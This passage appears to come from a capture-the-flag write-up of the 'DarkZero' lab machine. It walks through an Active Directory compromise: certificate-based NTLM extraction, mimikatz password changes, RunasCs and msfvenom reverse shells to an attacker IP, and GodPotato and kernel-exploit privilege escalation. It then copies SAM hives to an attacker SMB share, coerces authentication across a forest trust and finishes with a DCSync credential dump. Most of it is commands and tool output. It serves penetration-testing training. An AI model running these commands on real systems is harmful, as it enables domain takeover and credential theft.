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

Certify completed in 00:00:10.7667918
The above Base64 output can be used in Rubeus. But again due to the input limit, we can’t use the base64 string directly in our reverse shell. However, we can actually use the following command to extract the base64 ticket on Windows. We first save the whole Certify.exe output with --out-file:
Victim Windows (DC02)
.\Certify.exe request --ca darkzero.ext\darkzero-ext-DC02-CA --template user --out-file output.txt
We then use Regex to extract only the Base64 value from the output:
Victim Windows (DC02)
type output.txt | findstr /R "^[A-Za-z0-9+/=][A-Za-z0-9+/=]*$" > .\base64.txt
We still have to decode the base64 string to extract the certificate in binary form:
Victim Windows (DC02)
certutil -f -decode .\base64.txt .\cert.pfx
Now, we can use Rubeus’s asktgt module to extract the user’s NTLM hash using the /getcredentials flag. We have now extracted the svc_sql user’s NTLM hash, and we will use that to obtain a cleartext password for changing our logon type.
Victim Windows (DC02)
.\Rubeus.exe asktgt /user:svc_sql /domain:darkzero.ext /dc:dc02.darkzero.ext /certificate:.\cert.pfx /getcredentials
...
[*] Action: Ask TGT


[*] Using PKINIT with etype rc4_hmac and subject: CN=svc_sql, CN=Users, DC=darkzero, DC=ext 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'darkzero.ext\svc_sql'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...
...

  ServiceName              :  krbtgt/darkzero.ext
  ServiceRealm             :  DARKZERO.EXT
  UserName                 :  svc_sql
  UserRealm                :  DARKZERO.EXT
  StartTime                :  11/16/2025 3:49:05 AM
  EndTime                  :  11/16/2025 1:49:05 PM
  RenewTill                :  11/23/2025 3:49:05 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  fw17G0FG5us/sX0CKt9AEQ==
  ASREP (key)              :  45FD150C2B1E880447125DFF39CBFDD8

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 816CCB849956B531DB139346751DB65F

Changing svc_sql’s password with NTLM

We can use mimikatz’s lsadump::changentlm module to change our password using NLTM auth: changentlm | The Hacker Tools.
Victim Windows (DC02)
wget 10.10.14.52/mi64/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe
In our Mimikatz interface, we will run the following command.
mimikatz console
lsadump::changentlm /server:dc02.darkzero.ext /user:svc_sql /old:816CCB849956B531DB139346751DB65F /newpassword:P@ss1234
...
OLD NTLM     : 816ccb849956b531db139346751db65f
NEW NTLM     : 74520a4ec2626e3638066146a0d5ceae

Target server: dc02.darkzero.ext
Target user  : svc_sql
Domain name  : darkzero-ext
Domain SID   : S-1-5-21-1969715525-31638512-2552845157
User RID     : 1103

>> Change password is a success!

Logging in with Logon Type 5 (Service)

With the new password, we can now use RunasCs.exe:
Victim Windows (DC02)
wget 10.10.14.52/RunasCs.exe -o RunasCs.exe
We can run a shell to with logon type 5. We must run with the flag --bypass-uac to spawn the process without token limitations. This will essentially give us back our privileges.
Victim Windows (DC02)
.\RunasCs.exe svc_sql P@ss1234 powershell.exe -r 10.10.14.52:443 --logon-type 5 --bypass-uac
We now got a privileged shell that we can run impersonation attacks with Potatoes.
Victim Windows (DC02)
PS C:\Users\svc_sql> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Escalating to SYSTEM with SeImpersonatePrivilege

Getting GodPotato on the victim machine

With the SeImpersonate privilege, we can escalate our privilege to system using potato exploits. Here we’ll use GodPotato:
Victim Windows (DC02) - New Shell from RunasCs.exe
wget 10.10.14.52/potato/GodPotato-NET4.exe -o GodPotato.exe
Note that .NET version of the GodPotato binary has to match with the .NET version installed on the target machine. We can check that with the following command.
Victim Windows (DC02) - New Shell from RunasCs.exe
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s

Running God Potato

While you can do things like starting a reverse shell, I prefer adding a new administrator user, since GodPotato often cannot run stable reverse shells.
Victim Windows (DC02) - New Shell from RunasCs.exe
.\GodPotato.exe -cmd "cmd /c net user hacker password123! /add && net localgroup administrators hacker /add"

Switching to the admin shell

We will run the reverse shell with our new administrator user using RunasCs.exe again.
Victim Windows (DC02) - New Shell from RunasCs.exe
.\RunasCs.exe hacker password123! --logon-type 8 powershell.exe -r 10.10.14.52:443
On our reverse shell listener on port 443, we have successfully received a system level reverse shell.
Victim Windows (DC02) - System Shell from RunasCs.exe
PS C:\Windows\system32> whoami
darkzero-ext\hacker
PS C:\Windows\system32> cat c:\users\administrator\desktop\user.txt
4e00a52e5bde65df28fce67533ce894c

Unintended Path (CVE_2024_30088)

Exploiting Unpatched Windows Kernel Vulnerability

There is also an unintended privilege escalation path that exploits a kernel vulnerability. This can be discovered via Metasploit’s local_exploit_suggester module. We first generate a Meterpreter reverse shell payload for Windows. We then upload the generated payload to DC02.
Attacker Linux
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=4444 -f exe -o shell.exe
We then start a multi/handler on Metasploit and start a Meterpreter shell. Remember to correct set the payload.
msfconsole
set payload windows/x64/meterpreter/reverse_tcp
Then, we can use the following module to exploit this unpatched kernel exploit. I used windows/x64/shell_reverse_tcp as the payload and set up a non-Meterpreter listener to make things easier.
msfconsole
use windows/local/cve_2024_30088_authz_basep
On our listener, we got a system shell.
Victim Windows (DC02)
C:\Windows\system32>whoami
nt authority\system

Privilege Escalation

There is a cleanup.ps1 file in the Documents folder of the darkzero.ext admin.
  • Nothing of special interest. Just for cleaning up the box.

Dumping Administrator NTLM hash from DC02

Extracting SAM hive & System

With the system shell, we can dump the SAM hive locally to extract NTLM hashes. We will then use the same file transfer method to copy the dumped hives to our SMB share.
Victim Windows (DC02)
reg save hklm\system system.hive
reg save hklm\sam sam.hive
net use Z: \\10.10.14.52\share /user:test test
copy sam.hive \\10.10.14.52\share\
copy system.hive \\10.10.14.52\share\
We can then extract the NTLM hashes on our Attacker Linux using impacket’s secretsdump.py.
Attacker Linux
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
...
administrator:6963aad8ba1150192f3ca6341355eb49
Alternatively, we can dump credentials with mimikatz’s lsadump::sam module.
Victim Windows (DC02)
.\mimikatz.exe "lsadump::sam
...
User : Administrator
  Hash NTLM: 6963aad8ba1150192f3ca6341355eb49
We can verify the admin hash using NetExec’s LDAP module. Note that we are directly authenticating to DC01 with the administrator credentials of DC02.
Attacker Linux
nxc ldap 10.129.215.80 -d darkzero-ext -u administrator -H 6963aad8ba1150192f3ca6341355eb49
...
LDAP        10.129.215.80     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero-ext) (signing:Enforced) (channel binding:When Supported) 
LDAP        10.129.215.80     389    DC01             [+] darkzero-ext\administrator:6963aad8ba1150192f3ca6341355eb49 (Pwn3d!)

Enumerating Forest Trust

Since we are in a forest environment, we should enumerate the trust relationships & potential delegations between domains.

Searching for Unconstrained Delegation with NetExec

We can use NetExec’s built-in module to enumerate delegation (https://www.netexec.wiki/ldap-protocol/unconstrained-delegation). As we can see, the DC01$ machine has the flag TRUSTED_FOR_DELEGATION set.
Attacker Linux
└─$ nxc ldap 10.129.215.80 -d darkzero-ext -u administrator -H 6963aad8ba1150192f3ca6341355eb49 --trusted-for-delegation
LDAP        10.129.215.80     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero-ext) (signing:Enforced) (channel binding:When Supported) 
LDAP        10.129.215.80     389    DC01             [+] darkzero-ext\administrator:6963aad8ba1150192f3ca6341355eb49 (Pwn3d!)
LDAP        10.129.215.80     389    DC01             DC01$

Enumerating Domain Trust with NetExec

We can also use NetExec’s built-in module to enumerate domain trust (https://www.netexec.wiki/ldap-protocol/dc-list). We can read more about Domain Trust here: Trusts | The Hacker Recipes. 
┌──(kali㉿kali)-[~/Desktop/HTB/s9/DarkZero]
└─$ nxc ldap 172.16.20.1 -d darkzero-ext -u administrator -H 6963aad8ba1150192f3ca6341355eb49 --dc-list               
LDAP        172.16.20.1     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero-ext) (signing:Enforced) (channel binding:When Supported) 
LDAP        172.16.20.1     389    DC01             [+] darkzero-ext\administrator:6963aad8ba1150192f3ca6341355eb49 (Pwn3d!)
LDAP        172.16.20.1     389    DC01             DC01.darkzero.htb = 172.16.20.1
LDAP        172.16.20.1     389    DC01             [+] Found DC in trusted domain: dc02.darkzero.ext
LDAP        172.16.20.1     389    DC01             darkzero.ext -> Bidirectional -> Forest Transitive, Cross Organization Enable TGT Delegation
LDAP        172.16.20.1     389    DC01             dc02.darkzero.ext = 172.16.20.2

Attempting to request for login certificate as Administrator

Since we have cross-forest trust, maybe we can directly request for a domain administrator TGT? The answer is no, and this will fail since this is not how cross-domain trust works. Our DC02 admin credentials do not grant us domain administrator rights on DC01.
Attacker Linux
certipy req -u [email protected] -hashes '6963aad8ba1150192f3ca6341355eb49' -dc-ip 172.16.20.1 -target 'dc01.darkzero.htb' -ca 'darkzero-DC01-CA' -template 'Administrator' -pfx administrator.pfx
Since we do not have any actual permission on DC01, attacks like abusing write privileges with ESC4 will not work.
Attacker Linux
certipy template -u '[email protected]' -hashes '6963aad8ba1150192f3ca6341355eb49' -template User -dc-ip 172.16.20.1 -write-default-configuration

Abusing Unconstrained Delegation

After some Googling, we came across a great article on explain how we can abuse cross-forest trusts. Essentially, in a two-way (bidirectional) trusted forest, users from one forest can authenticate to another forest’s resource. Kerberos TGT issued by either forest can also flow between forest.
  • If we controlled one of the forest, and a privileged user of the other forest authenticate to our controlled forest with their TGT due to the trust relationship, we can capture and dump their ticket.
  • With the privileged ticket, we can then authenticate to the original forest as the privileged user.
  • Combining this with coercion attacks, we can essentially force the Domain Controller of target forest to authenticate to our controlled forest DC, and capture the TGT of the DC machine.
On our System shell of DC02, we can run Rubeus’s monitor module to capture any incoming authentication to capture their TGT. We will run Rubeus.exe on DC02 in an elevated shell (i.e. system shell).
Victim Windows (DC02) - System Shell
.\Rubeus.exe monitor /interval:5
We now can force the target DC (DC01) to authenticate to DC02. We can try running SpoolSample.exe on another shell on DC02. Unfortunately this didn’t work, as the printspooler service was not running on the machine.
Victim Windows (DC02)
.\SpoolSample.exe dc01.darkzero.htb dc02.darkzero.ext

Check if the target is vulnerable to Force Authentication

Luckily, NetExec has a module that can perform all coerce attacks. While DC02 is not vulnerable to the printer bugs, it is vulnerable to the other coercion attacks.
Attacker Linux
nxc smb '10.129.215.80' -d 'darkzero-ext' -u 'administrator' -H '6963aad8ba1150192f3ca6341355eb49' -M coerce_plus
...
VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, MSEven
There is also another coercion attack that targets any user currently logged on the same machine, but we did not test it here.

Running the Force Authentication attack

Again, on our System shell of DC02, we can run Rubeus’s monitor module to capture any incoming authentication to capture their TGT.
Victim Windows (DC02) - System Shell
.\Rubeus.exe monitor /interval:5
We can use the same module from NetExec to initiate the authentication. The -o flag is used to specify the module options. Here, we have to set the L= for the target listener, i.e., where the victim machine will be authenticating to.
Attacker Linux
nxc smb '10.129.215.80' -d 'darkzero-ext' -u 'administrator' -H '6963aad8ba1150192f3ca6341355eb49' -M coerce_plus -o L=dc02.darkzero.ext

Using the Captured TGT

We successfully got our TGT on the Rubeus monitor after triggering the coercion attacks. This is the Base64 encoded blob of the TGT of DC01$.
Rubues Output
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJ....
We can now renew and inject the TGT into our current machine (DC02$).
Victim Windows (DC02) - System Shell
.\Rubeus.exe renew /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDbEbR52cSpdrkhKRwIJtWLmRMAkH3wglJqhN6vBQIP9kWaEuLVSKp4+AHNFfXSL+RK2tDUOGGYjNNCG+A0D1CBAacgSent7q363vwsyHKWNqOYOVxrJ/nOvWp96stZ5rvjXbQO9K1neR09ZtKuBOk69RFPMHZrihWUhv1N/1nBVOKZeMfJ/pZr5RembAD2ccgkLcNOisVUsFYObsgPh9RGiKGt/hbZfGHGBODP678mmWsZqHItzoP9RyE4o5UVVYy2h881Uw7aS0bmviMs+tB1lQOW4D/noUUbSJeogmR/GXpybFU3ZnpW43kb2nlf7HejRrs82w7uInKHcejvssHX9fBL+oAvAeH0f7PjT0u7JI3w95sCdKtBhiMfme9R9oyDEFW1z+kyNDv9hDdfhkWfFj0W5I6NmhN0znCqZlDTB4EscaALreDPEUYpZWibfpha2SqkTwSKOd912sN9V3lEv74e6/sx5NSzbn2BQ/qVxhkvXNNZSOIbLthb1dSKR7buIiP2br8Pad92OOsSKhWK+1MlK2gfSnjM+LGekLFEbv0yckiIbjsgZdbyubVkHpaHRLmBbO2JrNMu6dCQIyOZp8FF+iizu+e+hAn1WVyKgpPFrykp+WdHezUhQgUinjhtpk+6xNnUJDTWR0puEjtjgV9YdRswiWW7jzv/Mbpg6KBhAUaeIzrjr0MZXhnDxVRzVRZVH4Y+AbWsCYDMuSLw7/ZnGQdZB340LGLuJAV0DW4vGaxZh3n/+jJK90ePawPWQazaGk1CQbp7MBf7/2vIDYfW8LbRjozFKc7+lZyFIFH1hjoBem/vsxIbQlZlP1TMS0cH/YsrG9MrE5GpmuFAPRaiZq19SjMZSKVWXagYGCMppiSCnIMK5DYPvSQxXQQ/UkZ2DQwIEmUeWgOjHJ5ocoAJ/6U0fLJbnBzIeSXtCv01UraDr82XY3H+kRERYpnHggw6v72q3ggk67SAZyr4WVlwes3EbHzSH4KR1LoFEpXJjHkUvuv9+z8iGbBWFcT+iiE5BwTEnC3qyxLd1tyGIvKzD0I/N+8qojkwJV6rQQ6xTOP5k5TykpXi3Hiv6b/bNbIH0G0SSEURRFhN50u2aB7pJXpqaFaTR/y1RL+ZjfaYSZUg2nNee6wvsPJT+LJ24WgL5Q7tuxZFMPyatM59nyh/RKZ0lyPNT0RFwAyGr4F6OzJsBWQviCdHdpTpF14NwB3DnAFDrdp0nfjRid+Fql+Pc159fr/O9/8sm8lpPWGu+abEv3J7YTOG8Z2j8zIyUiCZQURSBTKoATQEZscqmUlwXZvAj8L1mmlhKtmsytQcdmhYbS5Z3ojDiR9CiP6UadEDRJDk50HdqYF6oMmp/oGeWy6gL0vnWkOwNTyK1baHj6GdX1W0QgElgTRj/Ewicm0lNpx0WpOMkWT/4t6BnJUbpJznJo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgJDawWfD4142DWY8bFmDJajh7teEk0DHlc8BxyL6tCd+hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDcwNDI4MzhaphEYDzIwMjUxMDA3MTQyODM3WqcRGA8yMDI1MTAxNDA0MjgzN1qoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI= /ptt
We can validate if we have successfully injected the TGT using the klist command:
Victim Windows (DC02) - System Shell
C:\Windows\system32> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: DC01$ @ DARKZERO.HTB
        Server: krbtgt/DARKZERO.HTB @ DARKZERO.HTB
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize 
        Start Time: 10/6/2025 21:54:54 (local)
        End Time:   10/7/2025 7:54:53 (local)
        Renew Time: 10/13/2025 21:28:37 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY 
        Kdc Called:

Dumping Credentials with DCSync

Lastly, with the injected DC01$ machine TGT, we can perform a DCSync attack on DC01 using mimikatz. Remember to run privilege::debug to ensure we have enough privileges. We have successfully dumped NTLM hash of the Administrator of DC01.
Victim Windows (DC02) - System Shell
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:darkzero.htb /user:administrator" "exit"
...
Credentials:
  Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
...
Lastly, we can dump out the root flag with NetExec.
Attacker Linux
nxc smb '10.129.215.80' -u 'administrator' -H '5917507bdf2ef2c2b0a869a1cba40726' -x "type C:\users\administrator\desktop\root.txt"
...
4e567c90f1709e12e9f5ed7402687bfc

Key Learning

1. Enumerate MSSQL Linked Servers

There is a built-in function, use_link in impacket’s mssqlclient.py, which makes interaction with linked servers way easier.

2. Always look for cached Kerberos tickets

The cached tickets can be dumped out be used on Linux, or to retrieve the NTLM hash if it belongs to a service account.

3. Retrieve NTLM hash with Kerberos Ticket

Using the “UnPAC the hash” technique, we can retrieve the NTLM hash of a controlled service account by retrieve its Kerberos ticket (either by dumping or requesting), request a client-authentication certificate, and request a TGT to extract the NTLM hashes within the ticket. We can achieve this by Certify.exe + Rubeus.exe on Windows.
Victim Windows (DC02)
.\Certify.exe request --ca darkzero.ext\darkzero-ext-DC02-CA --template user --out-file output.txt
  • The cached ticket is used automatically if we are running this on the machine.
We then use Regex to extract only the Base64 value from the output:
Victim Windows (DC02)
type output.txt | findstr /R "^[A-Za-z0-9+/=][A-Za-z0-9+/=]*$" > .\base64.txt
We still have to decode the base64 string to extract the certificate in binary form:
Victim Windows (DC02)
certutil -f -decode .\base64.txt .\cert.pfx
Now, we can use Rubeus’s asktgt module to extract the user’s NTLM hash using the /getcredentials flag:
Victim Windows (DC02)
.\Rubeus.exe asktgt /user:svc_sql /domain:darkzero.ext /dc:dc02.darkzero.ext /certificate:.\cert.pfx /getcredentials

4. Using Regex with Certify & Rubeus Output to extract Base64 values

We can use Regex to extract only the Base64 value from the output:
Victim Windows (DC02)
type output.txt | findstr /R "^[A-Za-z0-9+/=][A-Za-z0-9+/=]*$" > .\base64.txt
We then decode the base64 string to extract the output in binary form:
Victim Windows (DC02)
certutil -f -decode .\base64.txt .\cert.pfx

5. Changing Password with NTLM using Mimikatz

We can use mimikatz’s lsadump::changentlm module to change our password using the NLTM hash: changentlm | The Hacker Tools
Victim Windows (DC02)
.\mimikatz.exe "lsadump::changentlm /server:<FQDN_of_DC> /user:<username> /old:<NT Hash> /newpassword:P@ss1234" "End"

6. Enumerate Windows Kernel Local Privilege Escalation (LPE) vulnerabilities

With Meterpreter shell, we can run post/multi/recon/local_exploit_suggester to check for all local privilege escalation vulnerabilities in Metasploit.

7. Unconstrained Delegation

For 2-way Cross Forest Trusts, we can abuse Unconstrained Delegation to obtain the TGT of another domain’s DC.
  • Basically we run a listener on our controlled DC, and force the target DC in the other forest to authenticate to our controlled DC. Since 2-way cross forest trusts are established, the target DC will authenticate to us using the same TGT that it will be using in it’s own forest. By capture the TGT, we can authenticate to the target forest as the target DC.

8. Run all Coercion Attacks

Always run all different coercion attacks when trying to trigger force authentication. Attacks like SpoolSample will not work if there is no printspooler service running on the machine.

Tags

Initial Access

#MSSQL #Linked_Servers #SQL #Ligolo #Service_Account #Logon_Type #Windows_Privilege #Restore_Privileges #Changing_Passwords #NTLM #Kerberos #Token_Impersonation #ADCS #Potato_Attacks #Kernel_Exploit #ActiveDirectory #Regex

Privilege Escalation

#Unconstrained_Delegation #Forest_Trust #Coersion_Attacks #Kerberos #DCSync
Last modified on May 24, 2026